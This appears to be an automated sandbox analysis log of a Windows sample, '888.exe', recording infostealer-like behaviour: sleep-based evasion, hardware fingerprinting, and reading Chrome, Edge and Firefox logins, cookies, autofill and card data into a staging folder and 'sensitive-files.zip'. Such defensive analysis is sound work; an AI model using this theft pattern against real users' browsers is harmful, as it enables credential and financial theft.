              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2402Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1815Jump to behavior
              Source: C:\Users\user\Desktop\888.exeAPI coverage: 7.7 %
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5832Thread sleep count: 2402 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5916Thread sleep count: 1815 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6136Thread sleep time: -2767011611056431s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5992Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\888.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT SerialNumber FROM Win32_BaseBoard
              Source: C:\Users\user\Desktop\888.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Name FROM Win32_Processor
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\AC\Jump to behavior
              Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Packages\adobe.acrobatreaderdc.protectedmode\Jump to behavior
              Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\Jump to behavior
              Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\AppData\Jump to behavior
              Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\Jump to behavior
              Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Packages\adobe.acrobatreaderdc.protectedmode\AC\Jump to behavior
              Source: 888.exe, 00000000.00000003.1720421272.000000000138E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive userers - NDCDYNVMware20,11696501413z
              Source: 888.exe, 00000000.00000003.1720421272.000000000138E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696501413o
              Source: 888.exe, 00000000.00000003.1720421272.000000000138E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696501413h
              Source: 888.exe, 00000000.00000003.1720421272.000000000138E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696501413
              Source: 888.exe, 00000000.00000003.1720421272.000000000138E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: www.interactiveuserers.co.inVMware20,11696501413~
              Source: 888.exe, 00000000.00000003.1720421272.000000000138E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696501413j
              Source: 888.exe, 00000000.00000003.1720421272.000000000138E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive userers - COM.HKVMware20,11696501413
              Source: 888.exe, 00000000.00000003.1720421272.000000000138E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696501413
              Source: 888.exe, 00000000.00000003.1720421272.000000000138E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696501413|UE
              Source: 888.exe, 00000000.00000003.1720421272.000000000138E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696501413x
              Source: 888.exe, 00000000.00000003.1720421272.000000000138E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696501413}
              Source: 888.exe, 00000000.00000003.1720421272.000000000138E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive userers - non-EU EuropeVMware20,11696501413
              Source: 888.exe, 00000000.00000003.1720421272.000000000138E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696501413x
              Source: 888.exe, 00000000.00000003.1720421272.000000000138E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696501413t
              Source: 888.exe, 00000000.00000003.1849050689.000000000131F000.00000004.00000020.00020000.00000000.sdmp, 888.exe, 00000000.00000003.1849152849.000000000132D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: 888.exe, 00000000.00000003.1720421272.000000000138E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive userers - HKVMware20,11696501413]
              Source: 888.exe, 00000000.00000003.1720421272.000000000138E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696501413s
              Source: 888.exe, 00000000.00000003.1720421272.000000000138E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive userers - EU East & CentralVMware20,11696501413
              Source: 888.exe, 00000000.00000003.1720421272.000000000138E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696501413u
              Source: 888.exe, 00000000.00000003.1720421272.000000000138E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive userers - GDCDYNVMware20,11696501413p
              Source: 888.exe, 00000000.00000003.1720421272.000000000138E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive userers - EU WestVMware20,11696501413n
              Source: 888.exe, 00000000.00000003.1720421272.000000000138E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696501413
              Source: 888.exe, 00000000.00000003.1720421272.000000000138E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696501413
              Source: 888.exe, 00000000.00000003.1720421272.000000000138E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: www.interactiveuserers.comVMware20,11696501413}
              Source: 888.exe, 00000000.00000003.1720421272.000000000138E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: interactiveuserers.co.inVMware20,11696501413d
              Source: 888.exe, 00000000.00000003.1720421272.000000000138E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696501413x
              Source: 888.exe, 00000000.00000003.1720421272.000000000138E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696501413
              Source: 888.exe, 00000000.00000003.1720421272.000000000138E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696501413t
              Source: 888.exe, 00000000.00000003.1720421272.000000000138E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696501413^
              Source: 888.exe, 00000000.00000003.1720421272.000000000138E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: interactiveuserers.comVMware20,11696501413
              Source: 888.exe, 00000000.00000003.1720421272.000000000138E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696501413f
              Source: 888.exe, 00000000.00000003.1720421272.000000000138E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696501413
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Users\user\Desktop\888.exeCode function: 0_2_00A71220 RtlAllocateHeap,GetProcessHeap,RtlAllocateHeap,0_2_00A71220
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Users\user\Desktop\888.exeMemory allocated: page read and write | page guardJump to behavior
              Source: C:\Users\user\Desktop\888.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoProfile -NonInteractive -NoLogo -Command "[Console]::OutputEncoding = [System.Text.Encoding]::UTF8; Get-Culture | Select -ExpandProperty DisplayName"Jump to behavior
              Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Roaming VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Web Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\cookies.sqlite VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\Desktop VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\Desktop VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\Desktop\888.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\Desktop\BNAGMGSPLO.pdf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\Desktop\BNAGMGSPLO.pdf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\Desktop\desktop.ini VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\Desktop\EEGWXUHVUG.png VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\Desktop\EEGWXUHVUG.png VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\Desktop\EOWRVPQCCS.mp3 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\Desktop\Excel.lnk VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\Desktop\GRXZDKKVDB.jpg VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\Desktop\GRXZDKKVDB.jpg VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\Desktop\NVWZAPQSQL.mp3 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\Desktop\NVWZAPQSQL.pdf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\Desktop\NVWZAPQSQL.pdf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\Desktop\PALRGUCVEH.png VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\Desktop\PALRGUCVEH.png VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\Desktop\PIVFAGEAAV.docx VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\Desktop\PIVFAGEAAV.docx VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\Desktop\PIVFAGEAAV.xlsx VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\Desktop\PIVFAGEAAV.xlsx VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\Desktop\SQSJKEBWDT.jpg VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\Desktop\SQSJKEBWDT.jpg VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\Desktop\SQSJKEBWDT.xlsx VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\Desktop\SQSJKEBWDT.xlsx VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\Desktop\SUAVTZKNFL.docx VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\Desktop\SUAVTZKNFL.docx VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\Documents VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\Documents\BNAGMGSPLO.pdf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\Documents\BNAGMGSPLO.pdf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\Documents\desktop.ini VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\Documents\EEGWXUHVUG.png VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\Documents\EEGWXUHVUG.png VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\Documents\EOWRVPQCCS.mp3 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\Documents\GRXZDKKVDB.jpg VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\Documents\GRXZDKKVDB.jpg VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\Documents\NVWZAPQSQL.mp3 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\Documents\NVWZAPQSQL.pdf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\Documents\NVWZAPQSQL.pdf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\Documents\PALRGUCVEH.png VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\Documents\PALRGUCVEH.png VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\Documents\PIVFAGEAAV.docx VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\Documents\PIVFAGEAAV.docx VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\Documents\PIVFAGEAAV.xlsx VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\Documents\PIVFAGEAAV.xlsx VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\Documents\SQSJKEBWDT.jpg VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\Documents\SQSJKEBWDT.jpg VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\Documents\SQSJKEBWDT.xlsx VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\Documents\SQSJKEBWDT.xlsx VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\Documents\SUAVTZKNFL.docx VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\Documents\SUAVTZKNFL.docx VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Temp\sensitive-files.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Temp\sensitive-files.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\000003.log VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Tf3PLLaybbhhT996exLfW29uv4B7ta\Autofill VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Tf3PLLaybbhhT996exLfW29uv4B7ta\Cookies VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Tf3PLLaybbhhT996exLfW29uv4B7ta\CreditCards VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Tf3PLLaybbhhT996exLfW29uv4B7ta\Downloads VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Tf3PLLaybbhhT996exLfW29uv4B7ta\History VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Tf3PLLaybbhhT996exLfW29uv4B7ta\screen1.png VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Tf3PLLaybbhhT996exLfW29uv4B7ta\screen1.png VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Tf3PLLaybbhhT996exLfW29uv4B7ta\sensitive-files.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Tf3PLLaybbhhT996exLfW29uv4B7ta\sensitive-files.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Tf3PLLaybbhhT996exLfW29uv4B7ta\user_info.txt VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Tf3PLLaybbhhT996exLfW29uv4B7ta\user_info.txt VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Tf3PLLaybbhhT996exLfW29uv4B7ta\Passwords\Chrome_Default.txt VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Tf3PLLaybbhhT996exLfW29uv4B7ta\Passwords\Edge_Default.txt VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Tf3PLLaybbhhT996exLfW29uv4B7ta\Passwords\Firefox_qnq0haq7.default.txt VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Tf3PLLaybbhhT996exLfW29uv4B7ta\History\Chrome_Default.txt VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Tf3PLLaybbhhT996exLfW29uv4B7ta\History\Chrome_Default.txt VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Tf3PLLaybbhhT996exLfW29uv4B7ta\History\Edge_Default.txt VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Tf3PLLaybbhhT996exLfW29uv4B7ta\History\Firefox_qnq0haq7.default.txt VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Tf3PLLaybbhhT996exLfW29uv4B7ta\Downloads\Chrome_Default.txt VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Tf3PLLaybbhhT996exLfW29uv4B7ta\Downloads\Chrome_Default.txt VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Tf3PLLaybbhhT996exLfW29uv4B7ta\Downloads\Edge_Default.txt VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Tf3PLLaybbhhT996exLfW29uv4B7ta\Downloads\Firefox_qnq0haq7.default.txt VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Tf3PLLaybbhhT996exLfW29uv4B7ta\Downloads\Firefox_qnq0haq7.default.txt VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Tf3PLLaybbhhT996exLfW29uv4B7ta\CreditCards\Chrome_Default.txt VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Tf3PLLaybbhhT996exLfW29uv4B7ta\CreditCards\Edge_Default.txt VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Tf3PLLaybbhhT996exLfW29uv4B7ta\CreditCards\Firefox_Firefox.txt VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Tf3PLLaybbhhT996exLfW29uv4B7ta\Cookies\Chrome_Default_Network.txt VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Tf3PLLaybbhhT996exLfW29uv4B7ta\Cookies\Edge_Default_Network.txt VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Tf3PLLaybbhhT996exLfW29uv4B7ta\Cookies\Firefox_qnq0haq7.default_Network.txt VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Tf3PLLaybbhhT996exLfW29uv4B7ta\Autofill\Chrome_Default.txt VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Tf3PLLaybbhhT996exLfW29uv4B7ta\Autofill\Edge_Default.txt VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Tf3PLLaybbhhT996exLfW29uv4B7ta\Autofill\Edge_Default.txt VolumeInformationJump to behavior
